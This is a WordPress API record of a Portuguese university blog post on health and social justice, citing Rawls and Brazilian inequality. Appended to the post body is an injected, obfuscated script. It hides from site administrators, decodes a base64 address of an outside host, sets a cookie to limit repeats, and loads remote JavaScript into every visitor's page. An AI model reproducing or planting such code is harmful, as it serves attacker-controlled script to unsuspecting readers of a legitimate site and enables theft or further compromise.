{"id":1090,"date":"2025-02-20T12:07:00","date_gmt":"2025-02-20T15:07:00","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1090"},"modified":"2026-04-16T13:17:45","modified_gmt":"2026-04-16T16:17:45","slug":"saude-e-justica-social","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/02\/20\/saude-e-justica-social\/","title":{"rendered":"Sa\u00fade \u00e9 Justi\u00e7a Social"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/480775262_18048091508334813_5358312807039959719_n-819x1024.webp\" alt=\"\" class=\"wp-image-1091\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/480775262_18048091508334813_5358312807039959719_n-819x1024.webp 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/480775262_18048091508334813_5358312807039959719_n-240x300.webp 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/480775262_18048091508334813_5358312807039959719_n-768x960.webp 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/480775262_18048091508334813_5358312807039959719_n.webp 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>A justi\u00e7a social \u00e9 um conceito central na constru\u00e7\u00e3o de sociedades mais igualit\u00e1rias. Ela se refere \u00e0 busca por equidade no acesso a direitos, recursos e oportunidades para todos os cidad\u00e3os, independentemente de sua origem social, ra\u00e7a, g\u00eanero ou condi\u00e7\u00e3o econ\u00f4mica. Essa justi\u00e7a abrange o acesso \u00e0 educa\u00e7\u00e3o, sa\u00fade, moradia e seguridade social, por exemplo.<\/p>\n\n\n\n<p>Um dos pensadores que melhor delineou os principais elementos para alcan\u00e7ar esse princ\u00edpio foi John Rawls. Nos seus estudos te\u00f3ricos, esse autor estabeleceu tr\u00eas pontos para alcan\u00e7ar equidade social:<\/p>\n\n\n\n<p>\u2022 garantia das liberdades fundamentais para todos;<\/p>\n\n\n\n<p>\u2022 igualdade de oportunidades;<\/p>\n\n\n\n<p>\u2022 manuten\u00e7\u00e3o de desigualdades apenas para favorecer os mais desfavorecidos.<\/p>\n\n\n\n<p>Ao analisarmos a sociedade brasileira encontramos profunda injusti\u00e7a, onde cerca de 50 milh\u00f5es de pessoas passam fome, vivem sem saneamento b\u00e1sico, em condi\u00e7\u00f5es insalubres de moradia, est\u00e3o expostas \u00e0 viol\u00eancia e \u00e0 explora\u00e7\u00e3o, e as desigualdades abissais em rela\u00e7\u00e3o \u00e0s oportunidades de acesso a tudo que possa conferir dignidade \u00e0 vida.<\/p>\n\n\n\n<p>Com isso, a justi\u00e7a social consiste no compromisso do Estado e de organiza\u00e7\u00f5es da sociedade civil na realiza\u00e7\u00e3o de a\u00e7\u00f5es voltadas para a resolu\u00e7\u00e3o desse problema compensando as desigualdades sociais hist\u00f3ricas, desenvolvendo pol\u00edticas p\u00fablicas que possam ser capazes de melhorar a vida de pessoas socialmente vulner\u00e1veis.<\/p>\n\n\n\n<p>A ideia de justi\u00e7a social passa tamb\u00e9m pela garantia de qualidade de vida a toda a popula\u00e7\u00e3o. Cabe ao governo oferecer sa\u00fade de qualidade, estabelecer pol\u00edticas de combate \u00e0 mortalidade infantil, prote\u00e7\u00e3o ao meio ambiente, educa\u00e7\u00e3o, etc.\ud83c\udf0d\ud83d\udc99<\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>A justi\u00e7a social \u00e9 um conceito central na constru\u00e7\u00e3o de sociedades mais igualit\u00e1rias. Ela se refere \u00e0 busca por equidade no acesso a direitos, recursos e oportunidades para todos os cidad\u00e3os, independentemente de sua origem social, ra\u00e7a, g\u00eanero ou condi\u00e7\u00e3o econ\u00f4mica. Essa justi\u00e7a abrange o acesso \u00e0 educa\u00e7\u00e3o, sa\u00fade, moradia e seguridade social, por exemplo. [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1091,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1090","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1090","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1090"}],"version-history":[{"count":2,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1090\/revisions"}],"predecessor-version":[{"id":1342,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1090\/revisions\/1342"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1091"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1090"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1090"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1090"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}